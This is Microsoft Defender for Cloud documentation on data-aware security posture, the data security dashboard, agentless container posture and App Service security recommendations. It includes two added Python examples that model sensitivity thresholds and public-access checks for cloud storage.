About data-aware security posture 
As digital transformation accelerates, organizations move data to the cloud at an 
exponential rate using multiple data stores such as object stores and managed/hosted 
databases. The dynamic and complex nature of the cloud has increased data threat 
surfaces and risks. This causes challenges for security teams around data visibility and 
protecting the cloud data estate. 


Data-aware security in Microsoft Defender for Cloud helps you to reduce risk to data, 
and respond to data breaches. Using data-aware security posture you can: 


- Automatically discover sensitive data resources across multiple clouds.

- Evaluate data sensitivity, data exposure, and how data flows across the organization.

- Proactively and continuously uncover risks that might lead to data breaches.

- Detect suspicious activities that might indicate ongoing threats to sensitive data resources.


Automatic discovery 


Data-aware security posture automatically and continuously discovers managed and 
shadow data resources across clouds, including different types of objects stores and 
databases. 


- Discover sensitive data using the sensitive data discovery extension that's included in the Defender Cloud Security Posture Management (CSPM) and Defender for Storage plans.

- In addition, you can discover hosted databases and data flows in Cloud Security Explorer and Attack Paths. This functionality is available in the Defender CSPM plan, and isn't dependent on the sensitive data discovery extension.


Smart sampling 


Defender for Cloud uses smart sampling to discover a selected number of assets in your cloud data stores. Smart sampling results discover evidence of sensitive data issues, while saving on discovery costs and time.


Data security in Defender CSPM 


Defender CSPM provides visibility and contextual insights into your organizational 
security posture. The addition of data-aware security posture to the Defender CSPM 
plan enables you to proactively identify and prioritize critical data risks, distinguishing 
them from less risky issues. 


Attack paths 


Attack path analysis helps you to address security issues that pose immediate threats, 
and have the greatest potential for exploit in your environment. Defender for Cloud 
analyzes which security issues are part of potential attack paths that attackers could use 
to breach your environment. It also highlights the security recommendations that need 
to be resolved in order to mitigate the risks. 


You can discover risk of data breaches by attack paths of internet-exposed VMs that 
have access to sensitive data stores. Hackers can exploit exposed VMs to move laterally 
across the enterprise to access these stores. Review attack paths. 


Cloud Security Explorer 


Cloud Security Explorer helps you identify security risks in your cloud environment by 
running graph-based queries on Cloud Security Graph (Defender for Cloud's context 
engine). You can prioritize your security team's concerns, while taking your 
organization's specific context and conventions into account. 


You can leverage Cloud Security Explorer query templates, or build your own queries, to 
find insights about misconfigured data resources that are publicly accessible and 
contain sensitive data, across multicloud environments. You can run queries to examine 
security issues, and to get environment context into your asset inventory, exposure to 
the internet, access controls, data flows, and more. Review cloud graph insights. 


Data security in Defender for Storage 


Defender for Storage monitors Azure storage accounts with advanced threat detection 
capabilities. It detects potential data breaches by identifying harmful attempts to access 
or exploit data, and by identifying suspicious configuration changes that could lead to a 
breach. 


When early suspicious signs are detected, Defender for Storage generates security 
alerts, allowing security teams to quickly respond and mitigate. 


By applying sensitivity information types and Microsoft Purview sensitivity labels on 
storage resources, you can easily prioritize the alerts and recommendations that focus 
on sensitive data. 


Learn more about sensitive data discovery in Defender for Storage. 


Data sensitivity settings 


Data sensitivity settings define what's considered sensitive data in your organization. 
Data sensitivity values in Defender for Cloud are based on: 


- Predefined sensitive information types: Defender for Cloud uses the built-in sensitive information types in Microsoft Purview. This ensures consistent classification across services and workloads. Some of these types are enabled by default in Defender for Cloud. You can modify these defaults.

- Custom information types/labels: You can optionally import custom sensitive information types and labels that you've defined in the Microsoft Purview compliance portal.

- Sensitive data thresholds: In Defender for Cloud you can set the threshold for sensitive data labels. The threshold determines the minimum confidence level for a label to be marked as sensitive in Defender for Cloud. Thresholds make it easier to explore sensitive data.


When discovering resources for data sensitivity, results are based on these settings. 


When you enable data-aware security capabilities with the sensitive data discovery 
component in the Defender CSPM or Defender for Storage plans, Defender for Cloud 
uses algorithms to identify data resources that appear to contain sensitive data. 
Resources are labeled in accordance with data sensitivity settings. 


Changes in sensitivity settings take effect the next time that resources are discovered. 
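The following is an added example, not part of the Microsoft documentation, that models the three settings above as a small classifier: a resource is labeled sensitive only when a finding matches an enabled predefined type or an imported custom label and its confidence reaches the threshold, and a settings change only shows up when the discovery pass is run again. The info type names, confidence numbers and resource names are constructed; the real product uses Purview information types and Low/Medium/High thresholds rather than the numeric scale used here.

```python
from __future__ import annotations

from dataclasses import dataclass, replace

# Constructed model of Defender for Cloud's data sensitivity settings. Labels,
# confidence values and resources are made up for the illustration.


@dataclass(frozen=True)
class SensitivitySettings:
    enabled_types: frozenset[str]   # predefined Purview info types turned on
    custom_labels: frozenset[str]   # custom types/labels imported from Purview
    min_confidence: int             # threshold: minimum confidence (0-100) to count


@dataclass(frozen=True)
class Finding:
    resource: str
    label: str
    confidence: int                 # classifier confidence, 0-100


def qualifying_labels(settings: SensitivitySettings, findings) -> dict[str, list[str]]:
    """Map each resource to the labels that make it sensitive under the settings.

    A finding counts only if its label is enabled (predefined or custom) AND its
    confidence reaches the threshold. Resources with no qualifying label are omitted.
    """
    allowed = settings.enabled_types | settings.custom_labels
    result: dict[str, list[str]] = {}
    for f in findings:
        if f.label in allowed and f.confidence >= settings.min_confidence:
            result.setdefault(f.resource, []).append(f.label)
    return {r: sorted(labels) for r, labels in sorted(result.items())}


# Constructed discovery findings for one pass over four object stores.
SAMPLE_FINDINGS = (
    Finding("bucket-a", "CreditCardNumber", 90),
    Finding("bucket-b", "SocialSecurityNumber", 70),   # below the default threshold
    Finding("bucket-c", "ProjectCodename", 80),        # custom label imported from Purview
    Finding("bucket-d", "IPAddress", 99),              # predefined type left disabled
)

DEFAULT_SETTINGS = SensitivitySettings(
    enabled_types=frozenset({"CreditCardNumber", "SocialSecurityNumber"}),
    custom_labels=frozenset({"ProjectCodename"}),
    min_confidence=75,
)


def with_threshold(min_confidence: int, base: SensitivitySettings = DEFAULT_SETTINGS) -> SensitivitySettings:
    """Settings change: lower or raise the sensitivity threshold."""
    return replace(base, min_confidence=min_confidence)


def enable_type(label: str, base: SensitivitySettings = DEFAULT_SETTINGS) -> SensitivitySettings:
    """Settings change: turn on a predefined info type that is off by default."""
    return replace(base, enabled_types=base.enabled_types | {label})


def discovery_run(settings: SensitivitySettings = DEFAULT_SETTINGS, findings=SAMPLE_FINDINGS):
    """One discovery pass; edited settings only take effect on the next pass."""
    return qualifying_labels(settings, findings)


if __name__ == "__main__":
    print(discovery_run())
    # {'bucket-a': ['CreditCardNumber'], 'bucket-c': ['ProjectCodename']}
    print(discovery_run(with_threshold(65)))      # bucket-b now qualifies
    print(discovery_run(enable_type("IPAddress")))  # bucket-d now qualifies
```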


Next steps 


- Prepare and review requirements for data-aware security posture management.

- Understanding data aware security posture - Defender for Cloud in the Field video


Support and prerequisites for data-aware security posture

Review the requirements on this page before setting up data-aware security posture in Microsoft Defender for Cloud.


Enabling sensitive data discovery 


Sensitive data discovery is available in the Defender CSPM and Defender for Storage 
plans. 


- When you enable one of the plans, the sensitive data discovery extension is turned on as part of the plan.

- If you have existing plans running, the extension is available, but turned off by default.

- Existing plan status shows as "Partial" rather than "Full" if one or more extensions aren't turned on.

- The feature is turned on at the subscription level.

- If sensitive data discovery is turned on, but Defender CSPM is not enabled, only storage resources will be scanned.


What's supported 


The table summarizes support for data-aware posture management. 


Support: What Azure data resources can I discover?
Details:
  Object storage:
  Block blob storage accounts in Azure Storage v1/v2
  Azure Data Lake Storage Gen2
  Storage accounts behind private networks are supported.
  Storage accounts encrypted with a customer-managed server-side key are supported.
  Accounts aren't supported if any of these settings are enabled: Public network access is disabled; Storage account is defined as Azure DNS Zone; The storage account endpoint has a custom domain mapped to it.
  Databases:
  Azure SQL Databases (Public preview)

Support: What AWS data resources can I discover?
Details:
  Object storage:
  AWS S3 buckets
  Defender for Cloud can discover KMS-encrypted data, but not data encrypted with a customer-managed key.
  Databases:
  Any flavor of RDS instances (Public preview)

Support: What GCP data resources can I discover?
Details:
  GCP storage buckets
  Standard Class
  Geo: region, dual region, multi region

Support: What permissions do I need for discovery?
Details:
  Storage account: Subscription Owner
  or
  Microsoft.Authorization/roleAssignments/* (read, write, delete) and
  Microsoft.Security/pricings/* (read, write, delete) and
  Microsoft.Security/pricings/SecurityOperators (read, write)
  Amazon S3 buckets and RDS instances: AWS account permission to run CloudFormation (to create a role).
  GCP storage buckets: Google account permission to run script (to create a role).

Support: What file types are supported for sensitive data discovery?
Details:
  Supported file types (you can't select a subset): .doc, .docm, .docx, .dot, .gz, .odp, .ods, .odt, .pdf, .pot, .pps, .ppsx, .ppt, .pptm, .pptx, .xlc, .xls, .xlsb, .xlsm, .xlsx, .xlt, .csv, .json, .psv, .ssv, .tsv, .txt, .xml, .parquet, .avro, .orc.

Support: What Azure regions are supported?
Details:
  You can discover Azure storage accounts in:
  Australia Central; Australia Central 2; Australia East; Australia Southeast; Brazil South; Canada Central; Canada East; Central India; Central US; East Asia; East US; East US 2; France Central; Germany West Central; Japan East; Japan West; Jio India West; North Central US; North Europe; Norway East; South Africa North; South Central US; South India; Sweden Central; Switzerland North; UAE North; UK South; UK West; West Central US; West Europe; West US; West US 3.
  You can discover Azure SQL Databases in any region where Defender CSPM and Azure SQL Databases are supported.

Support: What AWS regions are supported?
Details:
  S3:
  Asia Pacific (Mumbai); Asia Pacific (Singapore); Asia Pacific (Sydney); Asia Pacific (Tokyo); Canada (Montreal); Europe (Frankfurt); Europe (Ireland); Europe (London); Europe (Paris); Europe (Stockholm); South America (São Paulo); US East (Ohio); US East (N. Virginia); US West (N. California); US West (Oregon).
  RDS:
  Africa (Capetown); Asia Pacific (Hong Kong SAR); Asia Pacific (Hyderabad); Asia Pacific (Melbourne); Asia Pacific (Mumbai); Asia Pacific (Osaka); Asia Pacific (Seoul); Asia Pacific (Singapore); Asia Pacific (Sydney); Asia Pacific (Tokyo); Canada (Central); Europe (Frankfurt); Europe (Ireland); Europe (London); Europe (Paris); Europe (Stockholm); Europe (Zurich); Middle East (UAE); South America (São Paulo); US East (Ohio); US East (N. Virginia); US West (N. California); US West (Oregon).
  Discovery is done locally within the region.

Support: What GCP regions are supported?
Details:
  europe-west1, us-east1, us-west1, us-central1, us-east4, asia-south1, northamerica-northeast1

Support: Do I need to install an agent?
Details: No, discovery requires no agent installation.

Support: What's the cost?
Details: The feature is included with the Defender CSPM and Defender for Storage plans, and doesn't incur additional costs except for the respective plan costs.

Support: What permissions do I need to view/edit data sensitivity settings?
Details: You need one of these Microsoft Entra roles: Global Administrator, Compliance Administrator, Compliance Data Administrator, Security Administrator, Security Operator.

Support: What permissions do I need to perform onboarding?
Details: You need one of these Microsoft Entra roles: Security Admin, Contributor, Owner on the subscription level (where the GCP project/s reside in). For consuming the security findings: Security Reader, Security Admin, Reader, Contributor, Owner on the subscription level (where the GCP project/s reside).


Configuring data sensitivity settings 


The main steps for configuring data sensitivity settings include:


- Import custom sensitive info types/labels from the Microsoft Purview compliance portal

- Customize sensitive data categories/types

- Set the threshold for sensitivity labels


Learn more about sensitivity labels in Microsoft Purview. 


Discovery 


Defender for Cloud starts discovering data immediately after enabling a plan, or after 
turning on the feature in plans that are already running. 


For object storage: 


- It takes up to 24 hours to see the results for a first-time discovery.

- After files are updated in the discovered resources, data is refreshed within eight days.

- A new Azure storage account that's added to an already discovered subscription is discovered within 24 hours or less.

- A new AWS S3 bucket or GCP storage bucket that's added to an already discovered AWS account or Google account is discovered within 48 hours or less.


For databases: 


- Databases are scanned on a weekly basis.
- For newly enabled subscriptions, results will appear within 24 hours.


Discovering AWS S3 buckets 


In order to protect AWS resources in Defender for Cloud, you set up an AWS connector, 
using a CloudFormation template to onboard the AWS account. 


- To discover AWS data resources, Defender for Cloud updates the CloudFormation template.

- The CloudFormation template creates a new role in AWS IAM, to allow permission for the Defender for Cloud scanner to access data in the S3 buckets.

- To connect AWS accounts, you need Administrator permissions on the account.

- The role allows these permissions: S3 read only; KMS decrypt.


Discovering AWS RDS instances 


To protect AWS resources in Defender for Cloud, set up an AWS connector using a 
CloudFormation template to onboard the AWS account. 


- To discover AWS RDS instances, Defender for Cloud updates the CloudFormation template.

- The CloudFormation template creates a new role in AWS IAM, to allow permission for the Defender for Cloud scanner to take the last available automated snapshot of your instance and bring it online in an isolated scanning environment within the same AWS region.

- To connect AWS accounts, you need Administrator permissions on the account.

- Automated snapshots need to be enabled on the relevant RDS Instances/Clusters.

- The role allows these permissions (review the CloudFormation template for exact definitions):
  - List all RDS DBs/clusters
  - Copy all DB/cluster snapshots
  - Delete/update DB/cluster snapshot with prefix defenderfordatabases
  - List all KMS keys
  - Use all KMS keys only for RDS on source account
  - Full control on all KMS keys with tag prefix DefenderForDatabases
  - Create alias for KMS keys


Discovering GCP storage buckets

In order to protect GCP resources in Defender for Cloud, you can set up a Google connector using a script template to onboard the GCP account.

• To discover GCP storage buckets, Defender for Cloud updates the script template.

• The script template creates a new role in the Google account to allow permission for the Defender for Cloud scanner to access data in the GCP storage buckets.

• To connect Google accounts, you need Administrator permissions on the account.


Exposed to the internet/allows public access 


Defender CSPM attack paths and cloud security graph insights include information 
about storage resources that are exposed to the internet and allow public access. The 
following table provides more details. 


State: Exposed to the internet

Azure storage accounts: An Azure storage account is considered exposed to the internet if either of these settings is enabled:
  Storage_account_name > Networking > Public network access > Enabled from all networks
  or
  Storage_account_name > Networking > Public network access > Enable from selected virtual networks and IP addresses.

AWS S3 Buckets: An AWS S3 bucket is considered exposed to the internet if the AWS account/AWS S3 bucket policies don't have a condition set for IP addresses.

GCP Storage Buckets: All GCP storage buckets are exposed to the internet by default.

State: Allows public access

Azure storage accounts: An Azure storage account container is considered as allowing public access if these settings are enabled on the storage account:
  Storage_account_name > Configuration > Allow blob public access > Enabled,
  and either of these settings:
  Storage_account_name > Containers > container_name > Public access level set to Blob (anonymous read access for blobs only)
  or storage_account_name > Containers > container_name > Public access level set to Container (anonymous read access for containers and blobs).

AWS S3 Buckets: An AWS S3 bucket is considered to allow public access if both the AWS account and the AWS S3 bucket have Block all public access set to Off, and either of these settings is set:
  In the policy, RestrictPublicBuckets isn't enabled, and the Principal setting is set to * and Effect is set to Allow.
  Or, in the access control list, IgnorePublicAcl isn't enabled, and permission is allowed for Everyone, or for Authenticated users.

GCP Storage Buckets: A GCP storage bucket is considered to allow public access if it has an IAM (Identity and Access Management) role that meets these criteria:
  The role is granted to the principal allUsers or allAuthenticatedUsers.
  The role has at least one storage permission that isn't storage.buckets.create or storage.buckets.list.
  Public access in GCP is called "Public to internet".
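The "allows public access" criteria from the table, written out as evaluation logic so the three providers' rules can be compared side by side. This is an added example, not Defender for Cloud's own code: the dataclasses are a constructed, simplified view of each provider's settings (the real Azure, AWS and GCP APIs return richer objects), and the sample resources at the bottom are constructed for this illustration.

```python
"""Evaluate storage resources against the 'allows public access' criteria in the table above.

Added example, not Defender for Cloud's own code. The dataclasses are a constructed,
simplified view of each provider's settings (the real Azure, AWS and GCP APIs return richer
objects); field names follow the setting names used in the table. The sample resources at
the bottom are constructed for this illustration.
"""
from dataclasses import dataclass, field
from typing import Dict, List


@dataclass
class AzureStorageAccount:
    allow_blob_public_access: bool            # Configuration > Allow blob public access
    container_access_levels: Dict[str, str]  # container_name -> "Private" | "Blob" | "Container"


def azure_public_containers(acct: AzureStorageAccount) -> List[str]:
    """Containers allowing anonymous reads: the account switch AND a Blob/Container level."""
    if not acct.allow_blob_public_access:
        return []
    return sorted(name for name, level in acct.container_access_levels.items()
                  if level in ("Blob", "Container"))


@dataclass
class S3Bucket:
    account_block_all_public_access: bool   # account-level Block all public access
    bucket_block_all_public_access: bool    # bucket-level Block all public access
    restrict_public_buckets: bool           # RestrictPublicBuckets setting
    ignore_public_acl: bool                 # IgnorePublicAcl setting
    policy_statements: List[dict] = field(default_factory=list)  # bucket policy statements
    acl_grantees: List[str] = field(default_factory=list)        # ACL grantee names


_PUBLIC_ACL_GRANTEES = {"Everyone", "Authenticated users"}


def _principal_is_wildcard(principal) -> bool:
    """Accept both policy spellings of an anonymous principal: "*" and {"AWS": "*"}."""
    return principal == "*" or (isinstance(principal, dict) and principal.get("AWS") == "*")


def s3_allows_public_access(bucket: S3Bucket) -> bool:
    """AWS cell of the table: both block-all switches Off, then a public policy or ACL."""
    if bucket.account_block_all_public_access or bucket.bucket_block_all_public_access:
        return False
    policy_public = not bucket.restrict_public_buckets and any(
        stmt.get("Effect") == "Allow" and _principal_is_wildcard(stmt.get("Principal"))
        for stmt in bucket.policy_statements)
    acl_public = not bucket.ignore_public_acl and any(
        grantee in _PUBLIC_ACL_GRANTEES for grantee in bucket.acl_grantees)
    return policy_public or acl_public


@dataclass
class GcpBucket:
    iam_bindings: Dict[str, List[str]]      # role -> members bound on the bucket
    role_permissions: Dict[str, List[str]]  # role -> storage.* permissions it grants


_PUBLIC_PRINCIPALS = {"allUsers", "allAuthenticatedUsers"}
_NON_DATA_PERMISSIONS = {"storage.buckets.create", "storage.buckets.list"}


def gcp_allows_public_access(bucket: GcpBucket) -> bool:
    """GCP cell of the table: a public principal holds a role granting any storage
    permission other than storage.buckets.create or storage.buckets.list."""
    for role, members in bucket.iam_bindings.items():
        if not _PUBLIC_PRINCIPALS.intersection(members):
            continue
        if set(bucket.role_permissions.get(role, ())) - _NON_DATA_PERMISSIONS:
            return True
    return False


# Constructed samples: one resource per provider that meets the table's criteria.
SAMPLE_AZURE = AzureStorageAccount(
    allow_blob_public_access=True,
    container_access_levels={"logs": "Private", "web-assets": "Blob", "backups": "Container"})
SAMPLE_S3 = S3Bucket(
    account_block_all_public_access=False, bucket_block_all_public_access=False,
    restrict_public_buckets=False, ignore_public_acl=True,
    policy_statements=[{"Effect": "Allow", "Principal": {"AWS": "*"}, "Action": "s3:GetObject"}])
SAMPLE_GCP = GcpBucket(
    iam_bindings={"roles/storage.objectViewer": ["allUsers"]},
    role_permissions={"roles/storage.objectViewer": ["storage.objects.get", "storage.objects.list"]})

if __name__ == "__main__":
    print("Azure public containers:", azure_public_containers(SAMPLE_AZURE))
    print("S3 allows public access:", s3_allows_public_access(SAMPLE_S3))
    print("GCP allows public access:", gcp_allows_public_access(SAMPLE_GCP))
```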


Database resources do not allow public access but can still be exposed to the internet. 


Internet exposure insights are available for the following resources:

Azure:

• Azure SQL server
• Azure Cosmos DB
• Azure SQL Managed Instance
• Azure MySQL Single Server
• Azure MySQL Flexible Server
• Azure PostgreSQL Single Server
• Azure PostgreSQL Flexible Server
• Azure MariaDB Single Server
• Synapse Workspace

AWS:

• RDS instance

Note

• Exposure rules that include 0.0.0.0/0 are considered "excessively exposed", meaning that they can be accessed from any public IP.
• Azure resources with the exposure rule "0.0.0.0" are accessible from any resource in Azure (regardless of tenant or subscription).


Next steps 


Enable data-aware security posture. 


Data security dashboard 
The data security dashboard addresses the need for an interactive, data-centric security dashboard that illuminates significant risks to customers' sensitive data. This tool effectively prioritizes alerts and potential attack paths for data across multicloud data resources, making data protection management less overwhelming and more effective.


Capabilities 


• You can view a centralized summary of your cloud data estate that identifies the location of sensitive data, so that you can discover the most critical data resources affected.

• You can identify the data resources that are at risk and that require attention, so that you can prioritize actions that explore, prevent and respond to sensitive data breaches.

• Investigate active high severity threats that lead to sensitive data.

• Explore potential threats to data by highlighting attack paths that lead to sensitive data.

• Explore useful data insights by highlighting useful data queries in the security explorer.


You can select any element on the page to get more detailed information. 


Aspect: Release state
Details: Public Preview

Aspect: Prerequisites
Details: Defender for CSPM fully enabled, including sensitive data discovery. Workload protection for database and storage to explore active risks.

Aspect: Required roles and permissions
Details: No other roles needed on top of what is required for the security explorer.

Aspect: Clouds
Details: ✔ Commercial clouds; ✘ Azure Government; ✘ Azure China 21Vianet

Prerequisites


In order to view the dashboard, you must enable Defender CSPM and also turn on the sensitive data discovery extension listed beneath it. In addition, to receive the alerts for data sensitivity, you must also enable the Defender for Storage plan.



The feature is turned on at the subscription level. 


Required permissions and roles

• To view the dashboard you must have either one of the following scenarios:

  ◦ all of the following permissions:
    - Microsoft.Security/assessments/read
    - Microsoft.Security/assessments/subassessments/read
    - Microsoft.Security/alerts/read

  ◦ the minimum required privileged RBAC role of Security Reader.

• Each Azure subscription must be registered for the Microsoft.Security resource provider:

  1. Sign in to the Azure portal.
  2. Select the affected subscription.
  3. In the left-side menu, select the resource provider.
  4. Search for and select the Microsoft.Security resource provider from the list.
  5. Select Register.

Learn more about how to register for Azure resource provider.


Data security overview section 


The data security overview section provides a general overview of your cloud data estate, per cloud, including all data resources, divided into storage assets, managed databases, and hosted databases (IaaS).




By coverage status - displays the limited data coverage for resources without Defender CSPM workload protection:

• Covered — resources that have the necessary Defender CSPM, or Defender for Storage, or Defender for Databases enabled.

• Partially covered — missing either the Defender CSPM, Defender for Storage, or Defender for Databases plan. Select the tooltip to present a detailed view of what is missing.

• Sensitive resources — displays how many resources are sensitive.

• Sensitive resources requiring attention - displays the number of sensitive resources that have either high severity security alerts or attack paths.


Top issues 


The Top issues section provides a highlighted view of top active and potential risks to sensitive data.

• Sensitive data resources with high severity alerts - summarizes the active threats to sensitive data resources and which data types are at risk.

• Sensitive data resources in attack paths - summarizes the potential threats to sensitive data resources by presenting attack paths leading to sensitive data resources and which data types are at potential risk.

• Data queries in security explorer - presents the top data-related queries in security explorer that help focus on multicloud risks to sensitive data.




Closer look 


The Closer look section provides a more detailed view into the sensitive data within the organization.

• Sensitive data discovery - summarizes the results of the sensitive resources discovered, allowing customers to explore a specific sensitive information type and label.

• Internet-exposed data resources - summarizes the discovery of sensitive data resources that are internet-exposed for storage and managed databases.




You can select the Manage data sensitivity settings to get to the Data sensitivity page. 
The Data sensitivity page allows you to manage the data sensitivity settings of cloud 
resources at the tenant level, based on selective info types and labels originating from 
the Purview compliance portal, and customize sensitivity settings such as creating your 
own customized info types and labels, and setting sensitivity label thresholds. 




Data resources security status 


Sensitive resources status over time - displays how data security evolves over time with 
a graph that shows the number of sensitive resources affected by alerts, attack paths, 
and recommendations within a defined period (last 30, 14, or 7 days). 




Next steps 


• Learn more about data-aware security posture.
• Learn how to enable Defender CSPM.


Agentless container posture 


Article • 08/30/2023


Agentless container posture provides a holistic approach to improving your container 
posture within Defender CSPM (Cloud Security Posture Management). You can visualize 
and hunt for risks and threats to Kubernetes environments with attack path analysis and 
the cloud security explorer, and leverage agentless discovery and visibility within 
Kubernetes components. 


Learn more about CSPM. 


Capabilities 


For support and prerequisites for agentless containers posture, see Support and 
prerequisites for agentless containers posture. 


Agentless container posture provides the following capabilities: 


• Agentless discovery and visibility within Kubernetes components.

• Container registry vulnerability assessment provides vulnerability assessment for all container images, with near real-time scan of new images and daily refresh of results for maximum visibility to current and emerging vulnerabilities, enriched with exploitability insights, and added to Defender CSPM security graph for contextual risk assessment and calculation of attack paths.

• Using Kubernetes attack path analysis to visualize risks and threats to Kubernetes environments.

• Using cloud security explorer for risk hunting by querying various risk scenarios, including viewing security insights, such as internet exposure, and other predefined security scenarios. For more information, search for Kubernetes in the list of Insights.


All of these capabilities are available as part of the Defender CSPM plan. 


Agentless discovery and visibility within Kubernetes components


Agentless discovery for Kubernetes provides API-based discovery of information about 
Kubernetes cluster architecture, workload objects, and setup. For more information, see 
Agentless discovery for Kubernetes. 


What's the refresh interval? 


Agentless information in Defender CSPM is updated through a snapshot mechanism. It 
can take up to 24 hours to see results in attack paths and the cloud security explorer. 


Next steps 


• Learn about support and prerequisites for agentless containers posture

• Learn how to enable agentless containers


Security recommendations - a reference guide

Article • 09/27/2023


This article lists the recommendations you might see in Microsoft Defender for Cloud. The recommendations shown in your environment depend on the resources you're protecting and your customized configuration.


Recommendations in Defender for Cloud are based on the Microsoft cloud security benchmark. The Microsoft cloud security benchmark is the Microsoft-authored set of guidelines for security and compliance best practices based on common compliance frameworks. This widely respected benchmark builds on the controls from the Center for Internet Security (CIS) and the National Institute of Standards and Technology (NIST) with a focus on cloud-centric security.


To learn about how to respond to these recommendations, see Remediate 
recommendations in Defender for Cloud. 


Your secure score is based on the number of security recommendations you've 
completed. To decide which recommendations to resolve first, look at the severity of 
each one and its potential impact on your secure score. 


Tip


If a recommendation's description says "No related policy", it's usually because that 
recommendation is dependent on a different recommendation and its policy. For 
example, the recommendation "Endpoint protection health failures should be 
remediated...", relies on the recommendation that checks whether an endpoint 
protection solution is even installed ("Endpoint protection solution should be 
installed..."). The underlying recommendation does have a policy. Limiting the 
policies to only the foundational recommendation simplifies policy management. 


AppServices recommendations

There are 26 recommendations in this category.

Recommendation: API App should only be accessible over HTTPS
Description: Use of HTTPS ensures server/service authentication and protects data in transit from network layer eavesdropping attacks. (Related policy: API App should only be accessible over HTTPS)
Severity: Medium

Recommendation: CORS should not allow every resource to access API Apps
Description: Cross-Origin Resource Sharing (CORS) should not allow all domains to access your API app. Allow only required domains to interact with your API app. (Related policy: CORS should not allow every resource to access your API App)
Severity: Low

Recommendation: CORS should not allow every resource to access Function Apps
Description: Cross-Origin Resource Sharing (CORS) should not allow all domains to access your Function app. Allow only required domains to interact with your Function app. (Related policy: CORS should not allow every resource to access your Function Apps)
Severity: Low

Recommendation: CORS should not allow every resource to access Web Applications
Description: Cross-Origin Resource Sharing (CORS) should not allow all domains to access your web application. Allow only required domains to interact with your web app. (Related policy: CORS should not allow every resource to access your Web Applications)
Severity: Low

Recommendation: Diagnostic logs in App Service should be enabled
Description: Audit enabling of diagnostic logs on the app. This enables you to recreate activity trails for investigation purposes if a security incident occurs or your network is compromised. (No related policy)
Severity: Medium

Recommendation: Ensure API app has Client Certificates Incoming client certificates set to On
Description: Client certificates allow for the app to request a certificate for incoming requests. Only clients that have a valid certificate will be able to reach the app. (Related policy: Ensure API app has 'Client Certificates (Incoming client certificates)' set to 'On')
Severity: Medium

Recommendation: FTPS should be required in API apps
Description: Enable FTPS enforcement for enhanced security. (Related policy: FTPS only should be required in your API App)
Severity: High

Recommendation: FTPS should be required in function apps
Description: Enable FTPS enforcement for enhanced security. (Related policy: FTPS only should be required in your Function App)
Severity: High

Recommendation: FTPS should be required in web apps
Description: Enable FTPS enforcement for enhanced security. (Related policy: FTPS should be required in your Web App)
Severity: High

Recommendation: Function App should only be accessible over HTTPS
Description: Use of HTTPS ensures server/service authentication and protects data in transit from network layer eavesdropping attacks. (Related policy: Function App should only be accessible over HTTPS)
Severity: Medium

Recommendation: Function apps should have Client Certificates (Incoming client certificates) enabled
Description: Client certificates allow for the app to request a certificate for incoming requests. Only clients with valid certificates will be able to reach the app. (Related policy: Function apps should have 'Client Certificates (Incoming client certificates)' enabled)
Severity: Medium

Recommendation: Java should be updated to the latest version for API apps
Description: Periodically, newer versions are released for Java either due to security flaws or to include additional functionality. Using the latest Java version for API apps is recommended to benefit from security fixes, if any, and/or new functionalities of the latest version. (Related policy: Ensure that 'Java version' is the latest, if used as a part of the API app)
Severity: Medium

Recommendation: Managed identity should be used in API apps
Description: For enhanced authentication security, use a managed identity. On Azure, managed identities eliminate the need for developers to have to manage credentials by providing an identity for the Azure resource in Azure AD and using it to obtain Azure Active Directory (Azure AD) tokens. (Related policy: Managed identity should be used in your API App)
Severity: Medium

Recommendation: Managed identity should be used in function apps
Description: For enhanced authentication security, use a managed identity. On Azure, managed identities eliminate the need for developers to have to manage credentials by providing an identity for the Azure resource in Azure AD and using it to obtain Azure Active Directory (Azure AD) tokens. (Related policy: Managed identity should be used in your Function App)
Severity: Medium

Recommendation: Managed identity should be used in web apps
Description: For enhanced authentication security, use a managed identity. On Azure, managed identities eliminate the need for developers to have to manage credentials by providing an identity for the Azure resource in Azure AD and using it to obtain Azure Active Directory (Azure AD) tokens. (Related policy: Managed identity should be used in your Web App)
Severity: Medium

Recommendation: Microsoft Defender for App Service should be enabled
Description: Microsoft Defender for App Service leverages the scale of the cloud, and the visibility that Azure has as a cloud provider, to monitor for common web app attacks. Microsoft Defender for App Service can discover attacks on your applications and identify emerging attacks. Important: Remediating this recommendation will result in charges for protecting your App Service plans. If you don't have any App Service plans in this subscription, no charges will be incurred. If you create any App Service plans on this subscription in the future, they will automatically be protected and charges will begin at that time. Learn more in Protect your web apps and APIs. (Related policy: Azure Defender for App Service should be enabled)
Severity: High

Recommendation: PHP should be updated to the latest version for API apps
Description: Periodically, newer versions are released for PHP software either due to security flaws or to include additional functionality. Using the latest PHP version for API apps is recommended to benefit from security fixes, if any, and/or new functionalities of the latest version. (Related policy: Ensure that 'PHP version' is the latest, if used as a part of the API app)
Severity: Medium

Recommendation: Python should be updated to the latest version for API apps
Description: Periodically, newer versions are released for Python software either due to security flaws or to include additional functionality. Using the latest Python version for API apps is recommended to benefit from security fixes, if any, and/or new functionalities of the latest version. (Related policy: Ensure that 'Python version' is the latest, if used as a part of the API app)
Severity: Medium

Recommendation: Remote debugging should be turned off for API App
Description: Remote debugging requires inbound ports to be opened on an API app. Remote debugging should be turned off. (Related policy: Remote debugging should be turned off for API Apps)
Severity: Low

Recommendation: Remote debugging should be turned off for Function App
Description: Remote debugging requires inbound ports to be opened on an Azure Function app. Remote debugging should be turned off. (Related policy: Remote debugging should be turned off for Function Apps)
Severity: Low

Recommendation: Remote debugging should be turned off for Web Applications
Description: Remote debugging requires inbound ports to be opened on a web application. Remote debugging is currently enabled. If you no longer need to use remote debugging, it should be turned off. (Related policy: Remote debugging should be turned off for Web Applications)
Severity: Low

Recommendation: TLS should be updated to the latest version for API apps
Description: Upgrade to the latest TLS version. (Related policy: Latest TLS version should be used in your API App)
Severity: High

Recommendation: TLS should be updated to the latest version for function apps
Description: Upgrade to the latest TLS version. (Related policy: Latest TLS version should be used in your Function App)
Severity: High

Recommendation: TLS should be updated to the latest version for web apps
Description: Upgrade to the latest TLS version. (Related policy: Latest TLS version should be used in your Web App)
Severity: High

Recommendation: Web Application should only be accessible over HTTPS
Description: Use of HTTPS ensures server/service authentication and protects data in transit from network layer eavesdropping attacks. (Related policy: Web Application should only be accessible over HTTPS)
Severity: Medium

Recommendation: Web apps should request an SSL certificate for all incoming requests
Description: Client certificates allow for the app to request a certificate for incoming requests. Only clients that have a valid certificate will be able to reach the app. (Related policy: Ensure WEB app has 'Client Certificates (Incoming client certificates)' set to 'On')
Severity: Medium
